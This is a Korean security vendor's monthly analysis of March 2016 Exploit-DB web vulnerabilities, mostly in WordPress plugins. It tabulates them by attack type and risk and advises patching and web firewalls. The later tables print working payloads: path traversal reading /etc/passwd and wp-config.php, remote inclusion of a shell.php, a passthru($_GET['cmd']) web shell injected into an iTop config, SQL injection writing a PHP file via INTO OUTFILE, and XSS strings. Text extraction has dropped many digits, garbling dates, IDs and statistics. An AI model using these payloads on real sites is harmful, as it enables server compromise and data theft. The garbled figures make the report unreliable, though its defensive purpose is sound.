EDB 분석보고서 (06.03) ~ Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. 날짜 EDB 번호분류공격난이도공격위험도이름핵심공격코드대프로그램대환경 File Upload 하 C

EDB 분석보고서 (06.03) 06.03.0~06.03.3 Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. 분석내용정리 ( 작성 : 펜타시큐리티시스템보안성평가팀 ) 06 년 3 월에공개된 Exploit-DB 의분석결과, Local File Inclusion 공격에대한보고개수가가장많았습니다. Local File Inclusion 공격은주로 Directory Traversal 공격과함께이루어지는공격으로대파일이공격대서버에위치해있을때발생할수있습니다. Local File Inclusion 공격은파라미터값의경로를단순조작하는형태의쉬운공격입니다. 해당공격은시스템파일이유저에게노출되는피해를일으키기때문에난이도에비해위험도가매우높은입니다. Local File Inclusion 공격을예방하기위한가장좋은방법은소스코드를안전하게수정하는것입니다. 하지만사이트의규모가커서해당서버의모든입력값을검증하기어려운황이라면웹방화벽을도입하는것이현실적으로적절한방안입니다. 주요소프트웨어별발생현황을보면 Open Source CMS 로널리알려져있는 에서가장많은이보고되었습니다. 분석된 들은 자체의이라기보다주로신규 Plugin 들의이었습니다. 를사용하는관리자는사용인 Plguin 들의보안패치를실시하여서버가에노출되지않도록주의하여야합니다.. 별보고개수 보고개수 Code Injection File Upload SQL Injection 4 RFI 4 XSS 0 LFI 3 총합계 33 4 0 8 6 4 별보고개수 4 4 0 3 0 Code Injection File Upload SQL Injection RFI XSS LFI. 위험도별분류위험도 보고개수 백분율 6 8.8% 7 8.8% 합계 33 00.00% 위험도별분류 7 6 3. 공격난이도별현황공격난이도 보고개수 백분율 3 9.09% 3 9.09% 하 7 8.8% 총합계 33 00.00% 공격난이도별현황 3 3 7 하 4. 주요소프트웨어별발생현황 소프트웨어이름 보고개수 0 PivotX itop Joomla Monstra 총합계 33 주요소프트웨어별발생현황 0 PivotX itop Joomla Monstra ** 5개이발생한주요소프트웨어별세 EDB 번호 종류 공격난이도 공격위험도 이름 소프트웨어이름 3953 File Upload 하 CP Polls Plugin.0.8 - admin.php XSS 39547 XSS 하 Best Web Soft Captcha Plugin <= 4..5 - admin.php XSS () 39548 XSS 하 WP Advanced Comment Plugin 0.0 - / XSS 39547 XSS 하 Best Web Soft Captcha Plugin <= 4..5 - admin.php XSS 39553 XSS 하 DZS Videogallery Plugin <=8.60 - popup.php XSS 39553 XSS 하 DZS Videogallery Plugin <=8.60 - ajax.php XSS 39558 LFI 하 Site Import Plugin.0. - page.php LFI 39558 RFI 하 Site Import Plugin.0. - page.php RFI 39584 LFI 하 Image Export Plugin..0 - download.php LFI 39577 LFI 하 Abtest Plugin - abtest_admin.php LFI 39575 LFI 하 ebook Download Plugin. - filedownload.php LFI 39593 LFI 하 Memphis Document Library Plugin 3..5 - / LFI 39593 LFI 하 Memphis Document Library Plugin 3..5 - /mdocs-posts/ LFI 3959 LFI 하 Dharma booking Plugin.38.3 - proccess.php LFI 3959 RFI 하 Dharma booking Plugin.38.3 - proccess.php RFI 3959 LFI 하 Brandfolder Plugin 3.0 - callback.php LFI 3959 RFI 하 Brandfolder Plugin 3.0 - callback.php RFI 39589 LFI 하 HB Audio Gallery Lite Plugin.0.0 - audio-download.php LFI 3963 LFI 하 Photocart Link Plugin.6 - decode.php LFI 396 LFI 하 Plugin IMDb Profile Widget.0.8 - pic.php LFI

EDB 분석보고서 (06.03) 06.03.0~06.03.3 Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. 날짜 EDB 번호분류공격난이도공격위험도이름핵심공격코드대프로그램대환경 06-03-0 3953 File Upload 하 CP Polls Plugin.0.8 - admin.php XSS POST /wpadmin/admin.php?page=cp_polls&cal=&list=&i mport= HTTP/. Connection: CloseAccept: text/html, application/xhtml+xml, */* Accept-Language: ko-kr User-Agent: Mozilla/5.0 (compatible; MSIE 0.0; Windows NT 6.; WOW64; Trident/6.0) Content-Type: multipart/form-data; boundary=---- -----------------------7dd009908f CP Polls Plugin.0.8 -----------------------------7dd009908f name="importfile"; filename="csv.csv" Content-Type: application/octet-stream <img src=x onerror=alert('you_are_owned!') -----------------------------7dd009908f-- 06-03-0 39547 XSS 하 Best Web Soft Captcha Plugin <= 4..5 - admin.php XSS () /wpadmin/admin.php?page=captcha.php&action=whi telist&s=%3cscript%3ealert%8%9%3b%3c %Fscript%3E Best Web Soft Captcha Plugin <= 4.. 06-03-0 39548 XSS 하 POST / HTTP/. Connection: CloseAccept: text/html, application/xhtml+xml, */* Accept-Language: ko-kr User-Agent: Mozilla/5.0 (compatible; MSIE 0.0; Windows NT 6.; WOW64; Trident/6.0) Content-Type: multipart/form-data; boundary=---- -----------------------7dd009908f WP Advanced Comment Plugin 0.0 - / XSS 취약 -----------------------------7dd009908f 점 name="comment[meta_value]" WP Advanced Comment Plugin 0.0 Hack <script>alert("hacked")</script> -----------------------------7dd009908f name="comment[meta_key]" comment -----------------------------7dd009908f-- 06-03-0 39547 XSS 하 Best Web Soft Captcha Plugin <= 4..5 - admin.php XSS POST /wpadmin/admin.php?page=captcha.php&action=whi telist HTTP/. Best Web Soft Captcha Plugin <= 4.. s=<script>alert();</script>&search IP=Click here to claim your prize! 06-03- 39553 XSS 하 /wp-content/plugins/dzsvideogallery/admin/playlistseditor/popup.php?inite DZS Videogallery Plugin <=8.60 - popup.php XSS 취 r=whatava864%7%3balert%8%9%f% 약점 f645 DZS Videogallery Plugin <=8.6 06-03- 39553 XSS 하 DZS Videogallery /wp-content/plugins/dzsvideogallery/ajax.php?height=&source=6d7f"><s Plugin <=8.60 - ajax.php XSS cript>alert()<%fscript>894ba&type=&width= DZS Videogallery Plugin <=8.6 06-03-4 39558 LFI 하 Site Import Plugin.0. - page.php LFI /wp-content/plugins/siteimport/admin/page.php?url=..\..\..\..\..\..\.. \..\..\..\..\..\..\..\..\..\windows\win.ini Site Import Plugin.0. 06-03-4 39558 RFI 하 Site Import Plugin.0. - page.php RFI /wp-content/plugins/siteimport/admin/page.php?url=http%3a%f%floc alhost%fshell.php?shell=ls Site Import Plugin.0.

EDB 분석보고서 (06.03) 06.03.0~06.03.3 Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. 날짜 EDB 번호분류공격난이도공격위험도이름핵심공격코드대프로그램대환경 06-03-4 39559 SQL Injection..4 - item.query.php SQL Injection POST /source/item.query.php HTTP/... type=action_on_quick_icon&id=(select (CASE WHEN (644=644) THEN 644 ELSE 644*(SELECT 644 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))&action= 06-03-4 39559 SQL Injection..4 - view.query.php SQL Injection POST /source/view.query.php HTTP/... type=connections_logs&order=(select (CASE WHEN (6688=6688) THEN 6688 ELSE 6688*(SELECT 6688 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))&direction=DESC POST /monstra-3.0.3/users/8/edit HTTP/. 06-03-6 39567 XSS 하 Monstra CMS 3.0.3 - /monstra- 3.0.3/users/8/edit XSS csrf=685bba70d44b8b877937b56f5b87e669 35fe&user_id=8&login=user&firstname=%%3 E%3Cscript%3Ealert%8%9%3B%3C%Fscri pt%3e&lastname=%%3e%3cscript%3ealert %8%9%3B%3C%Fscript%3E&email=% %3E%3Cscript%3Ealert%8%9%3B%3C%F script%3e&twitter=%%3e%3cscript%3ealert %8%9%3B%3C%Fscript%3E&skype=% %3E%3Cscript%3Ealert%8%9%3B%3C%F script%3e&about_me=%%3e%3cscript%3eal ert%8%9%3b%3c%fscript%3e&new_pass word=&edit_profile=save Monstra Monstra CMS 3.0. 06-03-7 3957 RFI 하 06-03-7 3957 LFI 06-03-7 3957 LFI.4. - admin-logs.php RFI PivotX.3. - index.php LFI PivotX.3. - ajaxhelper.php LFI /zp-core/adminlogs.php?action=download_log&page=logs&tab= http://localhost/shell.php%3f%78%3d%69%64 %6%66%6f%6f%3d&filename=security&XSRFT oken=afd5bafed79d837486fdbeea8f87bc 9dea /pivotx_latest/pivotx/index.php?page=media&del=...//...//...//...//...//...//...//...//...//...//...//...// important/important.file&pivotxsession=ovyyn4ob jc5ym9 /pivotx_latest/pivotx/ajaxhelper.php?function=vie w&basedir=l3zhci93d3cvcglb3r4xxhdgvzdc9 CYXNlZGlyLwo=&file=../...//...//...//...//...//...//....//...//...//...//...//...//etc/passwd.4. PivotX PivotX.3. PivotX PivotX.3. 06-03- 39588 XSS 하 r58 - index.php XSS POST /my_files/index.php HTTP/. r58 search=%%3e%3cscript%3ealert%8%7xs S%7%9%3B%3C%Fscript%3E 06-03- 39588 XSS 하 r58 - clients.php XSS POST /clients.php HTTP/. r58 search=%%3e%3cscript%3ealert%8%7xs S%7%9%3C%Fscript%3E

EDB 분석보고서 (06.03) 06.03.0~06.03.3 Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. 날짜 EDB 번호분류공격난이도공격위험도이름핵심공격코드대프로그램대환경 06-03- 39587 Code Injection itop.. - config.php Code Injection POST /env-production/itopconfig/config.php?c%5bmenu%5d=configeditor HTTP/. operation=save&prev_config=&new_config=<? if(isset($_get['cmd'])) die(passthru($_get['cmd']));?> itop itop.. 06-03- 39584 LFI 하 Image Export Plugin..0 - download.php LFI /wp-content/plugins/imageexport/download.php?file=../../../wp-config.php Image Export Plugin..0 06-03- 39577 LFI 하 06-03- 39575 LFI 하 06-03- 39593 LFI 하 06-03- 39593 LFI 하 Abtest Plugin - abtest_admin.php LFI ebook Download Plugin. - filedownload.php LFI Memphis Document Library Plugin 3..5 - / LFI Memphis Document Library Plugin 3..5 - /mdocsposts/ LFI /wpcontent/plugins/abtest/abtest_admin.php?action=../../etc/passwd /wp-content/plugins/ebookdownload/filedownload.php?ebookdownloadurl=../../../wp-config.php /?mdocs-img-preview=../../../wp-config.php /mdocs-posts/?mdocs-img-preview=../../../wpconfig.php Abtest Plugin ebook Download Plugin. Memphis Document Library Plugin 3..5 Memphis Document Library Plugin 3..5 06-03- 3959 LFI 하 Dharma booking Plugin.38.3 - proccess.php LFI /wp/dharmabooking/frontend/ajax/gateways/proccess.php?ga teway=../../../../../../etc/passwd%00 Dharma booking Plugin.38.3 06-03- 3959 RFI 하 Dharma booking Plugin.38.3 - proccess.php RFI /wp/dharmabooking/frontend/ajax/gateways/proccess.php?ga teway=http://www.example.com/index.php Dharma booking Plugin.38.3 06-03- 3959 LFI 하 Brandfolder Plugin 3.0 - callback.php LFI /wp/wpcontent/plugins/brandfolder/callback.php?wp_abs path=../../../wp-config.php%00 Brandfolder Plugin 3.0 06-03- 3959 RFI 하 Brandfolder Plugin 3.0 - callback.php RFI /wp/wpcontent/plugins/brandfolder/callback.php?wp_abs path=http://www.example.com/index.php Brandfolder Plugin 3.0 06-03- 39590 SQL Injection 하 Joomla Easy Youtube Gallery /index.php?option=com_easy_youtube_gallery&vie.0. - index.php SQL Injection 취 w=videos&mycategory=0%7%0or%0%7% 약점 7=%7%7&defaultvideo=9&Itemid=75 Joomla Joomla Easy Youtube Gallery.0. 06-03- 39589 LFI 하 HB Audio Gallery Lite Plugin.0.0 - audiodownload.php LFI /wp-content/plugins/hb-audio-gallerylite/gallery/audiodownload.php?file_path=../../../../wpconfig.php&file_size=0 HB Audio Gallery Lite Plugin.0.0 06-03-7 3963 LFI 하 Photocart Link Plugin.6 - decode.php LFI /wp-content/plugins/photocartlink/decode.php?id=li4vli4vli4vd3aty9uzmlnln BocA== Photocart Link Plugin.6 06-03-7 396 LFI 하 06-03-8 3966 XSS 하 Plugin IMDb Profile Widget.0.8 - pic.php LFI 5.. - /user/test/home XSS /wp-content/plugins/imdbwidget/pic.php?url=../../../wp-config.php POST /user/test/home?p_p_id=79&p_p_lifecycle=&p_p _state=maximized&p_p_mode=view&_79_struts_a ction=%fenterprise_admin%fedit_user HTTP/. Plugin IMDb Profile Widget.0.8 5.. _79_jobTitle="><script>alert();</script>

EDB 분석보고서 (06.03) 06.03.0~06.03.3 Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. 날짜 EDB 번호분류공격난이도공격위험도이름핵심공격코드대프로그램대환경 06-03-30 39637 SQL Injection 6.0.0 - admin.php SQL Injection /admin.php?_g=products&cat_id=&sort[updated ]=DESC&char=T]%7%0UNION%0SELECT% 0,,3,4,5,6,7,8,9,'<? phpinfo();?>',,,3,4,5,6,7,8,9,0,,,3,4,5,6,7,8,9,0,,,3,4, 5,6,7,8%0INTO%0OUT FILE%0'/var/www/site/file.php'%0--%0 6.0.0 06-03-30 39637 XSS 하 6.0.0 - index.php XSS POST /index.php?_a=profile HTTP/. 6.0.0 first_name=" onmouseover="javascript:alert(/immuniweb/);"